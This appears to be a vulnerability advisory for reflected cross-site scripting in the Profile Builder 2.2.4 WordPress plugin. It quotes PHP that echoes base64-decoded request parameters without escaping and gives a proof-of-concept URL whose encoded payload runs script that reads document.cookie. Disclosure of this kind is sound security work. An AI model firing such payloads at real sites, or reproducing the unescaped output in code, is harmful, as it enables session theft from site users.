Profile Builder 2.2.4 Reflected XSS

Homepage:

https://wordpress.org/plugins/profile-builder/

Description:

$_GET['loginerror'] is not escaped.

File: profile-builder\front-end\login.php

// display our login errors
if( isset( $_GET['loginerror'] ) || isset( $_POST['loginerror'] ) ){
    $loginerror = isset( $_GET['loginerror'] ) ? $_GET['loginerror'] : $_POST['loginerror'];
    $loginerror = '<p class="wppb-error">'.urldecode( base64_decode( $loginerror ) ).'</p><!-- .error -->';
    if( isset( $_GET['request_form_location'] ) ){
        if( $_GET['request_form_location'] == 'widget' && !in_the_loop() ){
            $login_form .= $loginerror;
        }
        elseif( $_GET['request_form_location'] == 'page' && in_the_loop() ){
            $login_form .= $loginerror;
        }
    }
}

Similar issue exists also inside wck_single_metabox_errors_display(). There $_GET['wckerrorfields'] and $_GET['wckerrormessages'] are not escaped properly.

File: profile-builder\assets\lib\wck-api\wordpress-creation-kit.php

/* mark the fields */
if( isset( $_GET['wckerrorfields'] ) && !empty( $_GET['wckerrorfields'] ) ){
    echo '<script type="text/javascript">';
    $field_names = explode( ',', urldecode( base64_decode( $_GET['wckerrorfields'] ) ) );
    foreach( $field_names as $field_name ){
        echo "jQuery( '.field-label[for=\"". $field_name ."\"]' ).addClass('error');";
    }
    echo '</script>';
}

/* alert the error messages */
if( isset( $_GET['wckerrormessages'] ) ){
    echo '<script type="text/javascript">alert("'. urldecode( str_replace( '%0A', '\n', base64_decode( $_GET['wckerrormessages'] ) ) ) .'")</script>';
}

Proof of Concept:

login-page is page where shortcode [wppb-login] is used.

http://wordpress-url/login-page?loginerror=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg&request_form_location=page

Timeline: